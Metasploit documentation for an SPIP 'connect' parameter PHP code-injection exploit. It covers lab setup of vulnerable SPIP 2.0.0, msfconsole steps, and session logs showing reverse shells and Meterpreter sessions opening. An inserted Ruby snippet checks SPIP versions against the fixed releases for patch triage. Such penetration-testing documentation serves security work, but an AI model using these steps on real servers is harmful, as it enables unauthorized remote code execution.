
Spip Connect Exec

documentation/modules/exploit/multi/http/spip_connect_exec.md


Vulnerable Application

This module exploits a PHP code injection vulnerability in SPIP. The vulnerability exists in the connect parameter and allows an unauthenticated user to execute arbitrary commands with the privileges of the web server user. Branches 2.0, 2.1, and 3 are affected. Vulnerable versions are < 2.0.21, < 2.1.16, and < 3.0.3. This module is compatible with both Unix/Linux and Windows platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20 on Apache running on Ubuntu, Fedora, and Windows Server.
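The version ranges above are the data a defender needs when triaging an inventory of SPIP installs. The following Ruby snippet is an added example, not code from the Metasploit module or the SPIP project: it classifies a detected version string against the fixed releases stated on this page (2.0.21, 2.1.16, 3.0.3) using RubyGems' version comparison. The function name, the constant and the sample inventory are all constructed for the example.

```ruby
# Added example (not part of the module or its documentation): classify an
# SPIP version string against the vulnerable ranges stated above.
# Branches 2.0 and 2.1 are keyed by "major.minor"; the page treats branch 3 as
# a whole, with 3.0.3 as the first fixed release.
require 'rubygems' # Gem::Version is normally preloaded; required here for clarity

# First fixed release per affected branch (values taken from the page).
FIXED_SPIP_VERSIONS = {
  '2.0' => Gem::Version.new('2.0.21'),
  '2.1' => Gem::Version.new('2.1.16'),
  '3'   => Gem::Version.new('3.0.3')
}.freeze

# Returns :vulnerable, :patched, :unknown_branch (a branch this page says
# nothing about) or :invalid (not a parseable version string).
def classify_spip_version(version_string)
  return :invalid unless Gem::Version.correct?(version_string)

  version  = Gem::Version.new(version_string)
  segments = version.segments
  return :invalid if segments.length < 2

  # Branch 3 is matched on the major number alone, as the page describes it.
  branch = segments[0] == 3 ? '3' : segments.first(2).join('.')
  fixed  = FIXED_SPIP_VERSIONS[branch]
  return :unknown_branch if fixed.nil?

  version < fixed ? :vulnerable : :patched
end

# Given a host => version hash, return only the hosts that still need patching.
def hosts_needing_patch(inventory)
  inventory.select { |_host, ver| classify_spip_version(ver) == :vulnerable }.keys
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inventory for demonstration only.
  sample = {
    'cms-01.example.test' => '2.0.11',
    'cms-02.example.test' => '2.0.21',
    'cms-03.example.test' => '3.0.2',
    'cms-04.example.test' => '2.2.0'
  }
  sample.each { |host, ver| puts "#{host} #{ver} -> #{classify_spip_version(ver)}" }
  puts "Needs patching: #{hosts_needing_patch(sample).join(', ')}"
end
```

Because the branch is derived from the parsed version rather than from a string prefix, a value such as `2.0` (no patch number) still lands on the right branch, while anything the page does not cover is reported as an unknown branch rather than silently marked safe.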

Setup

On Ubuntu 20.04, download a vulnerable instance of SPIP:

wget https://files.spip.net/spip/archives/SPIP-v2-0-0.zip

Unzip it to a specific folder:

mkdir spip-site
cp SPIP-v2-0-0.zip spip-site/
cd spip-site/
unzip SPIP-v2-0-0.zip

Install PHP 5.6 and the necessary extensions:

  1. Add the PPA for PHP 5.6:

sudo add-apt-repository ppa:ondrej/php
sudo apt-get update

  2. Install PHP 5.6 with SQLite extensions:

sudo apt-get install php5.6 php5.6-sqlite php5.6-sqlite3

  3. Enable the required extensions in the PHP configuration file. Open the PHP INI file for CLI:

sudo nano /etc/php/5.6/cli/php.ini

Add or uncomment the following lines:

extension=sqlite3.so
extension=pdo_sqlite.so

Serve the application (while in the newly created spip-site directory):

php5.6 -S 127.0.0.1:8000

Navigate to the following URL, select sqlite for the database, and complete the installation:

http://127.0.0.1:8000/ecrire/

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/spip_connect_exec
  3. Do: set RHOSTS [IP]
  4. Do: set LHOST [IP]
  5. Do: exploit

Options

No options

Targets

0 (PHP In-Memory)

This uses an in-memory PHP payload to execute code.

1 (Unix/Linux Command Shell)

This executes a Unix or Linux command.

2 (Windows Command Shell)

This executes a Windows command.

Scenarios

SPIP 2.0.0 - Linux target - PHP In-Memory

msf exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 2.0.0
[+] The target appears to be vulnerable.
[*] 192.168.1.36:8000 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 192.168.1.36
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:47020) at 2024-08-22 19:19:00 +0200

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > 

SPIP 2.0.0 - Unix/Linux Command Shell

msf exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 2.0.0
[+] The target appears to be vulnerable.
[*] 192.168.1.36:8000 - Attempting to exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.36
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:32794) at 2024-08-22 19:20:41 +0200

meterpreter > sysinfo 
Computer     : 192.168.1.36
OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

SPIP 2.0.0 - Windows Command Shell

Somehow, I was unable to obtain remote code execution (RCE) in my lab environment using the Windows Command Shell target.
However, based on the exploit's design and its success on other platforms, it is expected to work.
The issue might be specific to my lab setup.